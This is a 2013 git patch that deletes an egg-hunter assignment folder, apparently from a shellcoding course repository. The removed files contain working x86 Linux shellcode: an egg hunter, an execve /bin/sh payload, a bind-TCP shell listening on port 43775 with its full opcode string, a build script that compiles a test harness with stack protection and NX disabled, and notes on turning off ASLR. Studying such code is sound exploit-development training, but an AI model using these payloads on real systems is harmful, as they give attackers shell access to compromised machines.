From eaeab3e5f708c1f0ef0eb53f08e5c7cc86b0a02d Mon Sep 17 00:00:00 2001
From: arno01
Date: Thu, 28 Mar 2013 13:19:37 +0100
Subject: [PATCH] Assignment 3 - major updates over Egg Hunter
---
 exam3/NOTES | 11 --
 exam3/USAGE | 32 ------
 exam3/egghunter.nasm | 79 -------------
 exam3/hunter.nasm | 40 -------
 exam3/make.sh | 130 ----------------------
 exam3/payload-execve-stack.nasm | 44 --------
 exam3/payload-shell_bind_tcp_smaller.nasm | 113 -------------------
 exam3/payload.nasm | 1 -
 exam3/shellcode.c | 18 ---
 9 files changed, 468 deletions(-)
 delete mode 100644 exam3/NOTES
 delete mode 100644 exam3/USAGE
 delete mode 100644 exam3/egghunter.nasm
 delete mode 100644 exam3/hunter.nasm
 delete mode 100755 exam3/make.sh
 delete mode 100644 exam3/payload-execve-stack.nasm
 delete mode 100644 exam3/payload-shell_bind_tcp_smaller.nasm
 delete mode 120000 exam3/payload.nasm
 delete mode 100644 exam3/shellcode.c
diff --git a/exam3/NOTES b/exam3/NOTES
deleted file mode 100644
index 088dd00..0000000
--- a/exam3/NOTES
+++ /dev/null
@@ -1,11 +0,0 @@
-NOTES
-
- no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
-
- execstack: disables Executable space protection (NX).
- Or Data Execution Prevention (DEP) on Windows,
- or Write XOR Execute (W^X) on BSD.
- CPU’s NX bit ("Never eXecute").
-
- To disalbe Address Space Layout Randomization (ASLR) when running binary
- setarch `arch` -R ./program
diff --git a/exam3/USAGE b/exam3/USAGE
deleted file mode 100644
index e2492b0..0000000
--- a/exam3/USAGE
+++ /dev/null
@@ -1,32 +0,0 @@
-USAGE
-
-1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
-
-I'm using a symlink as follows
-
-exam3$ ln -svf payload-execve-stack.nasm payload.nasm
-`payload.nasm' -> `payload-execve-stack.nasm'
-
-
-2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
-
-exam3$ ./make.sh "egg.MaRk"
- [I] Using custom EGG mark: egg.MaRk
- [+] Compiling payload.nasm ...
- [+] Compiling hunter.nasm ...
- [+] Extracting PAYLOAD code from payload ...
- [+] Adding EGG mark to PAYLOAD ...
- [+] Checking PAYLOAD code for NULLs ...
- [+] Extracting HUNTER code from hunter ...
- [+] Checking HUNTER code for NULLs ...
- [+] Compiling shellcode.c ...
--rwx------. 1 arno arno 5100 Mar 27 17:02 ./shellcode
- [+] All done!
-
-
-3. Run the shellcode
-
-exam3$ ./shellcode
-Hunter Length: 21
-Payload Length: 36
-sh-4.1$
diff --git a/exam3/egghunter.nasm b/exam3/egghunter.nasm
deleted file mode 100644
index 90b829a..0000000
--- a/exam3/egghunter.nasm
+++ /dev/null
@@ -1,79 +0,0 @@
-; This program is free software: you can redistribute it and/or modify
-; it under the terms of the GNU General Public License as published by
-; the Free Software Foundation, either version 3 of the License, or
-; (at your option) any later version.
-;
-; This program is distributed in the hope that it will be useful,
-; but WITHOUT ANY WARRANTY; without even the implied warranty of
-; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-; GNU General Public License for more details.
-;
-; You should have received a copy of the GNU General Public License
-; along with this program. If not, see .
-;
-;
-; Filename: egghunter.nasm
-; Author: Andrey Arapov
-; 2013 March
-;
-;
-
-section .data
- egg1 equ "Egg-" ; DWORD Egg marker part1
- egg2 equ "Mark" ; DWORD Egg marker part2
-
-
-section .text
-global _start
-
-
-_start:
- jmp short EggPoint
-
-continue:
- pop eax
-
- ; Searching for the Egg marker
-next:
- inc eax ; Searching backwards
-isEgg:
- cmp dword [eax-8], egg1
- jne next
- cmp dword [eax-4], egg2
- jne next
- call eax
-
- ; EXIT
- xor eax, eax
- mov al, 1
- xor ebx, ebx
- int 0x80
-
-EggPoint:
- call continue
-
-Egg:
- db "Egg-Mark" ; QWORD egg marker
-
- ; loop counter = 8
- xor ecx, ecx
- mov cl, 8
-decloop:
- dec eax
- loop decloop
-
- mov ecx, eax
- xor edx, edx
- mov dl, 8
- xor eax, eax
- mov al, 4
- xor ebx, ebx
- mov bl, 1
- int 0x80
-
- xor eax, eax
- mov al, 1
- xor ebx, ebx
- int 0x80
-
-
diff --git a/exam3/hunter.nasm b/exam3/hunter.nasm
deleted file mode 100644
index da46f05..0000000
--- a/exam3/hunter.nasm
+++ /dev/null
@@ -1,40 +0,0 @@
-; This program is free software: you can redistribute it and/or modify
-; it under the terms of the GNU General Public License as published by
-; the Free Software Foundation, either version 3 of the License, or
-; (at your option) any later version.
-;
-; This program is distributed in the hope that it will be useful,
-; but WITHOUT ANY WARRANTY; without even the implied warranty of
-; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-; GNU General Public License for more details.
-;
-; You should have received a copy of the GNU General Public License
-; along with this program. If not, see .
-;
-;
-; Filename: hunter.nasm
-; Author: Andrey Arapov
-; 2013 March
-;
-;
-
-section .data
- egg1 equ "Egg-" ; DWORD Egg marker part1
- egg2 equ "Mark" ; DWORD Egg marker part2
-
-
-section .text
-global _start
-
-
-_start:
- ; Searching for the Egg marker
-next:
- inc eax ; Searching forward (can also try dec eax)
-isEgg:
- cmp dword [eax-8], egg1 ; Checking if we can see egg1
- jne next ; If not, continuing to search
- cmp dword [eax-4], egg2
- jne next
-
- call eax ; Once found, we call our payload
diff --git a/exam3/make.sh b/exam3/make.sh
deleted file mode 100755
index 00c5f73..0000000
--- a/exam3/make.sh
+++ /dev/null
@@ -1,130 +0,0 @@
-#!/usr/bin/env sh
-#
-# USAGE
-# ./make.sh [Egg-Mark]
-#
-# NOTE
-# Egg-Mark must be a plaintext with 8 bytes in length
-# If Egg-Mark was not specified, the default one will be used.
-#
-# To specify a custom payload, simply modify the code of payload.nasm file.
-# Alternativly, you can modify PAYLOADCODE= variable down below the code.
-#
-
-ARG1=$1
-
-if [ -z "$ARG1" ]; then
- echo " [I] Argument not specified. Using default EGG mark."
- ARG1="Egg-Mark";
-elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
- echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
- exit 1;
-else
- echo " [I] Using custom EGG mark: "$ARG1
-fi
-
-
-DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
-EGGMARK=$ARG1
-NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
-
-# Uncomment to save EGGMARK in HEX
-EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
-
-# Cleanup
-rm -f shellcode payload.o payload hunter.o hunter
-
-echo " [+] Compiling payload.nasm ..."
-nasm -f elf32 -o payload.o payload.nasm
-ld -m elf_i386 -o payload payload.o
-
-echo " [+] Compiling hunter.nasm ..."
-nasm -f elf32 -o hunter.o hunter.nasm
-ld -m elf_i386 -o hunter hunter.o
-
-echo " [+] Extracting PAYLOAD code from payload ..."
-PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
-
-echo " [+] Adding EGG mark to PAYLOAD ..."
-FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
-
-echo " [+] Checking PAYLOAD code for NULLs ..."
-if [[ $FULL_PAYLOADCODE == *00* ]]; then
- echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
- exit 1
-fi
-
-
-echo " [+] Extracting HUNTER code from hunter ..."
-HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
-
-# For debugging only
-#echo ${DEFAULTEGG[0]}
-#echo ${DEFAULTEGG[1]}
-#echo ${NEWEGG[0]}
-#echo ${NEWEGG[1]}
-
-# Preparing Default egg to HEX form in order to replace it with a New egg
-DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-
-# Uncomment to save new EGGMARK in HEX format
-NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-
-# Uncomment to save new EGGMARK in Plaintext format
-#NEWEGG1=$(echo -n ${NEWEGG[0]})
-#NEWEGG2=$(echo -n ${NEWEGG[1]})
-
-
-FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
-
-echo " [+] Checking HUNTER code for NULLs ..."
-if [[ $FULL_HUNTERCODE == *00* ]]; then
- echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
- exit 1
-fi
-
-
-# Uncomment to see what will is replaced (default egg with a new one)
-#echo $DEFEGG1
-#echo $DEFEGG2
-#echo $NEWEGG1
-#echo $NEWEGG2
-#echo $HUNTERCODE
-#echo $FULL_HUNTERCODE
-
-cat > shellcode.c << EOF
-#include
-#include
-
-unsigned char hunter[] = \
-$FULL_HUNTERCODE;
-
-unsigned char garbage1[] = \
-"Just some garbage here...";
-
-unsigned char payload[] = \
-$FULL_PAYLOADCODE;
-
-unsigned char garbage2[] = \
-"And some garbage there...";
-
-main()
-{
- printf("Hunter Length: %d\n", strlen(hunter));
- printf("Payload Length: %d\n", strlen(payload));
- int (*ret)() = (int(*)())hunter;
- ret();
-}
-EOF
-
-echo " [+] Compiling shellcode.c ..."
-gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
-
-# Cleanup
-rm -f payload.o payload hunter.o hunter
-
-ls -la ./shellcode
-
-echo " [+] All done!"
diff --git a/exam3/payload-execve-stack.nasm b/exam3/payload-execve-stack.nasm
deleted file mode 100644
index 1ab23b8..0000000
--- a/exam3/payload-execve-stack.nasm
+++ /dev/null
@@ -1,44 +0,0 @@
-; This program is free software: you can redistribute it and/or modify
-; it under the terms of the GNU General Public License as published by
-; the Free Software Foundation, either version 3 of the License, or
-; (at your option) any later version.
-;
-; This program is distributed in the hope that it will be useful,
-; but WITHOUT ANY WARRANTY; without even the implied warranty of
-; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-; GNU General Public License for more details.
-;
-; You should have received a copy of the GNU General Public License
-; along with this program. If not, see .
-
-; Filename: payload-execve-stack.nasm
-; Author: Andrey Arapov
-; 2013 March
-
-global _start
-
-
-section .text
-
-_start:
- ; EAX
- xor eax, eax
- mov al, 11 ; execve syscall
-
- ; EBX
- xor edx, edx
- push edx ; NULL termination of '//bin/sh' string
- push 0x68732f6e ; '//bin/sh' in reverse
- push 0x69622f2f ; beginning of '//bin/sh' string is here
- mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
-
- ; ECX
- push edx ; NULL termination of a stack
- push ebx ; load our '//bin/sh' on a stack
- mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
-
- ; EDX
- push edx ; NULL terminator
- mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
- int 0x80
-
diff --git a/exam3/payload-shell_bind_tcp_smaller.nasm b/exam3/payload-shell_bind_tcp_smaller.nasm
deleted file mode 100644
index 7eae9b0..0000000
--- a/exam3/payload-shell_bind_tcp_smaller.nasm
+++ /dev/null
@@ -1,113 +0,0 @@
-; This program is free software: you can redistribute it and/or modify
-; it under the terms of the GNU General Public License as published by
-; the Free Software Foundation, either version 3 of the License, or
-; (at your option) any later version.
-;
-; This program is distributed in the hope that it will be useful,
-; but WITHOUT ANY WARRANTY; without even the implied warranty of
-; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-; GNU General Public License for more details.
-;
-; You should have received a copy of the GNU General Public License
-; along with this program. If not, see .
-;
-;
-; Filename: payload-shell_bind_tcp_smaller.nasm
-; Author: Andrey Arapov
-; 2013 March
-;
-; DESC:
-; - Binds to a port 43775
-; - Execs Shell on incoming connection
-;
-;
-; Shellcode size: 108 bytes
-; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
-;
-; Port is the last two bytes of the shellcode.
In hex \xaa\xff (0xaaff = 43775)
-;
-;
-
-global _start
-
-section .text
-
-_start:
- xor eax, eax
- mov al, 102 ; socketcall
- xor ebx, ebx
- inc ebx ; 1 = SYS_SOCKET socket()
- push BYTE 6 ; IPPROTO_TCP || int protocol);
- push BYTE 1 ; SOCK_STREAM || int type,
- push BYTE 2 ; AF_INET || socket(int domain,
- mov ecx, esp ; ECX - PTR to arguments for socket()
- int 0x80
- mov esi, eax ; save socket fd in ESI for later
-
-
- jmp short call_get_port
-port_in_esp:
- pop edi ; getting port address from ESP
-
- push BYTE 102
- pop eax ; socketcall
- inc ebx ; 2 = SYS_BIND bind()
- xor edx, edx
- push edx ; 0 = ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
- push WORD [edi] ; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
- push WORD bx ; 2 = AF_INET || struct sockaddr { short sin_family,
- mov ecx, esp ; Save PTR to sockaddr struct in ECX
- push BYTE 16 ; socklen_t addrlen);
- push ecx ; const struct sockaddr *addr,
- push esi ; bind(int sockfd,
- mov ecx, esp ; ECX = PTR to arguments for bind()
- int 0x80
-
-
- mov BYTE al, 102 ; socketcall
- inc ebx
- inc ebx ; 4 = SYS_LISTEN listen()
- push BYTE 1 ; int backlog);
- push esi ; listen(int sockfd,
- mov ecx, esp ; ECX = PTR to arguments for listen()
- int 0x80
-
-
- mov BYTE al, 102 ; socketcall
- inc ebx ; 5 = SYS_ACCEPT = accept()
- push edx ; socklen_t *addrlen = 0);
- push edx ; struct sockaddr *addr = NULL,
- push esi ; listen(int sockfd,
- mov ecx, esp ; ECX = PTR to arguments for accept()
- int 0x80
-
-
- ; dup2 to duplicate sockfd, that will attach the client to a shell
- ; that we'll spawn below in execve syscall
- xchg eax, ebx ; after EBX = sockfd, EAX = 5
- push BYTE 2
- pop ecx
-dup2_loop:
- mov BYTE al, 63
- int 0x80
- dec ecx
- jns dup2_loop
-
-
- ; spawning as shell
- xor eax, eax
- push eax
- push 0x68732f6e ; '//bin/sh' in reverse
- push 0x69622f2f ; beginning of '//bin/sh' string is here
- mov ebx, esp
- push eax
- mov edx, esp ; ESP is now
pointing to EDX
- push ebx
- mov ecx, esp
- mov al, 11 ; execve
- int 0x80
-
-call_get_port:
- call port_in_esp
- db 0xaa, 0xff ; BYTE (43775 in straight hex)
-
diff --git a/exam3/payload.nasm b/exam3/payload.nasm
deleted file mode 120000
index 5ba03e3..0000000
--- a/exam3/payload.nasm
+++ /dev/null
@@ -1 +0,0 @@
-payload-execve-stack.nasm
\ No newline at end of file
diff --git a/exam3/shellcode.c b/exam3/shellcode.c
deleted file mode 100644
index feaf2d7..0000000
--- a/exam3/shellcode.c
+++ /dev/null
@@ -1,18 +0,0 @@
-#include
-#include
-
-unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
-
-unsigned char garbage1[] = "Just some garbage here...";
-
-unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
-
-unsigned char garbage2[] = "And some garbage there...";
-
-main()
-{
- printf("Hunter Length: %d\n", strlen(hunter));
- printf("Payload Length: %d\n", strlen(payload));
- int (*ret)() = (int(*)())hunter;
- ret();
-}